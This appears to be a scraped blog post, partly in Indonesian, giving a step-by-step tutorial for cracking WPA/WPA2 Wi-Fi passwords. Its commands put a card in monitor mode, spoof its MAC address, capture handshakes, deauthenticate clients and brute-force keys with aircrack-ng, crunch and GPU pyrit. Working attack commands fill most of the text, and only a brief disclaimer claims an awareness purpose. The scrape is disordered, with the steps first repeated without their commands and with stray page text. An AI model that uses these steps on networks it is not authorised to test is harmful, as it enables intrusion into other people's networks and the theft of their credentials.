PERINGATAN: Jangan Hack Jaringan Milik Negara atau Instansi yang berwenang Jika Tidak ingin di penjara, Informasi ini Hanya sekedar Ilmu pengetahuan saja, dengan demikian kita bisa lebih waspada terhadap serangan ini dan lebih meningkatkan ke amanan jaringan terhadap pola berikut.
Dalam Hal ini Zodiakpisces mengunakan Windows 7, jadi saya mengaplisaikan Backtrack ke dalam software VMware Workstation.
Pertama Buka VMware Workstation Lalu Jalan kan
Aturan untuk Ikuti
Dalam Hal ini Zodiakpisces mengunakan Windows 7, jadi saya mengaplisaikan Backtrack ke dalam software VMware Workstation.
Pertama Buka VMware Workstation Lalu Jalan kan
- Jika Belum memiliki VMware Workstation silahkan Download di SINI
- Create a new virtual machine :
- tekan Enter ...... go on
- Pada menu BOOT .... cukup ketik startx
- Enter
Aturan untuk Ikuti
- A Backtrack Live CD : Linux Live CD yang memungkinkan Anda melakukan segala macam pengujian keamanan dan tugas. Ambil sendiri salinan dari CD dan membakarnya
- di sini link untuk men-download di sini
- Saya sangat menyarankan Anda untuk men-download backtrck 32 bit versi karena itu berjalan lancar ... di Win7 64bit melalui vmware workstation ........../
Steps to Follow:
Step 1 :
The result will be something like :
Step 2 :
Step 3 (Optional) :
Change the mac address of the mon0 interface.
Step 4 :
Then, press "
*where -c is the channel
-w is the file to be written
--bssid is the BSSID This terminal is keeping running.Step 6 : open another terminal.
*where -a is the BSSID
-c is the client MAC address (STATION) Wait for the handshake.Step 7 : Use the John the Ripper as word list to crack the WPA/WP2 password.
Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,
If you do not want to use John the Ripper as word list, you can use Crunch. Go to the official site of crunch.
Download crunch 3.0 (the current version at the time of this writing).
*where
The result will be something like :
Step b :
Step c (Optional) :
Change the mac address of the mon0 interface.
Step d :
Then, press "
Step f :
open another terminal.
*where -a is the BSSID
-c is the client MAC address (STATION) Wait for the handshake.Step g : If the following programs are not yet installed, please do it.
Step h :
Go to the official site of crunch.
Download
Step i :
Go to the official site of pyrit.
Download
Step j :
*where
*where
Remarks :
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second. To test if your wireless card (either USB or PCI-e) can do the injection or not :
Open another terminal.
airmon-ng
The result will be something like :
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
Step 2 :
airmon-ng start wlan0
Step 3 (Optional) :
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step 4 :
airodump-ng mon0
Then, press "
Ctrl+c
" to break the program.Step 5 :airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0
*where -c is the channel
-w is the file to be written
--bssid is the BSSID This terminal is keeping running.Step 6 : open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION) Wait for the handshake.Step 7 : Use the John the Ripper as word list to crack the WPA/WP2 password.
aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,
If you do not want to use John the Ripper as word list, you can use Crunch. Go to the official site of crunch.
Here
Download crunch 3.0 (the current version at the time of this writing).
Here
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -
*where
8 16
is the length of the password, i.e. from 8 characters to 16 characters.(B) nVidia Display Card with CUDA If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.Step a :airmon-ng
The result will be something like :
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
Step b :
airmon-ng start wlan0
Step c (Optional) :
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step d :
airodump-ng mon0
Then, press "
Ctrl+c
" to break the program.Step e :airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0
Step f :
open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION) Wait for the handshake.Step g : If the following programs are not yet installed, please do it.
apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy
Step h :
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download
crunch 3.0
(the current version at the time of this writing).http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
Step i :
Go to the official site of pyrit.
Enter Here
Download
pyrit
and cpyrit-cuda
(the current version is 0.4.0 at the time of this writing).tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install
tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install
Step j :
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where
8 16
is the length of the password, i.e. from 8 characters to 16 characters.Step k (Optional) : If you encounter error when reading the
DI JAMIN BUKAN SCAM ATAU PENIPUAN
wpacrack-01.cap
, you should do the following step.pyrit -r wpacrack-01.cap -o new.cap stripLive
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where
8 16
is the length of the password, i.e. from 8 characters to 16 characters.Step l : Then, you will see something similar to the following.Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg Here
This code is distributed under the GNU General Public License v3+
Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)
Tried 17960898 PMKs so far; 17504 PMKs per second.
Remarks :
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second. To test if your wireless card (either USB or PCI-e) can do the injection or not :
airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0
Make sure pyrit workable on your system :
pyrit list_cores
Posting Komentar